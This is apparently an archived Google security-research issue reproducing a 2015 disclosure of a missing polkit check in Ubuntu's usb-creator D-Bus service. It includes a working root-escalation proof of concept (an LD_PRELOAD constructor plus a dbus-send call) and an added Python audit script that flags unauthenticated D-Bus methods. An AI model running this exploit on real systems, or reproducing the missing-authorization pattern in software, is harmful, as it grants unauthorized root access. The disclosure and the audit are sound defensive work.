prince156 / google-security-research

Automatically exported from code.google.com/p/google-security-research

Linux: missing authentication check in usb-creator leads to local privilege escalation #413

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
[Also: http://www.ubuntu.com/usn/usn-2576-1/]

Date: Wed, 22 Apr 2015 16:50:08 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: USBCreator D-Bus service

Hello,

[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]

On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.

It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.

This seems like an obvious mistake, and the following appears to work
on my machine:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
    chown("/tmp/test", 0, 0);
    chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Thanks, Tavis.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by cev...@google.com on 28 May 2015 at 10:14
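
An added example, not part of the original report or of usb-creator's code: a static audit that lists D-Bus-exported methods which never call the authorization helper, the class of mistake the report describes for KVMTest. It assumes a dbus-python style service using `@dbus.service.method` decorators; the sample source, `com.example.Helper`, `Format` and `run_vm` are constructed for illustration.

```python
import ast

# Constructed sample, not usb-creator's source: a dbus-python style service
# in which one exported method skips the authorization helper.
SAMPLE_SERVICE = '''
import dbus.service

class Helper(dbus.service.Object):
    def check_polkit(self, sender, conn, action):
        pass  # would raise if the caller is not authorized

    @dbus.service.method("com.example.Helper", in_signature="s",
                         sender_keyword="sender", connection_keyword="conn")
    def Format(self, device, sender=None, conn=None):
        self.check_polkit(sender, conn, "com.example.format")
        return True

    @dbus.service.method("com.example.Helper", in_signature="sa{ss}",
                         sender_keyword="sender", connection_keyword="conn")
    def KVMTest(self, device, env, sender=None, conn=None):
        return run_vm(device, env)  # no authorization call before acting
'''

def _name(node):
    """Return the trailing identifier of a Name, Attribute or Call node."""
    if isinstance(node, ast.Call):
        node = node.func
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return None

def unauthenticated_methods(source, auth_func="check_polkit", decorator="method"):
    """List (class, method, line) for exported methods that never call auth_func.

    This checks presence only, not that the call happens before privileged work.
    """
    findings = []
    for cls in ast.walk(ast.parse(source)):
        if not isinstance(cls, ast.ClassDef):
            continue
        for fn in cls.body:
            if not isinstance(fn, ast.FunctionDef):
                continue
            exported = any(_name(d) == decorator for d in fn.decorator_list)
            calls = {_name(n) for n in ast.walk(fn) if isinstance(n, ast.Call)}
            if exported and auth_func not in calls:
                findings.append((cls.name, fn.name, fn.lineno))
    return findings

if __name__ == "__main__":
    print(unauthenticated_methods(SAMPLE_SERVICE))
```

A finding here is a prompt for manual review: a method that is flagged may be intentionally unauthenticated, and a method that passes may still call the helper too late.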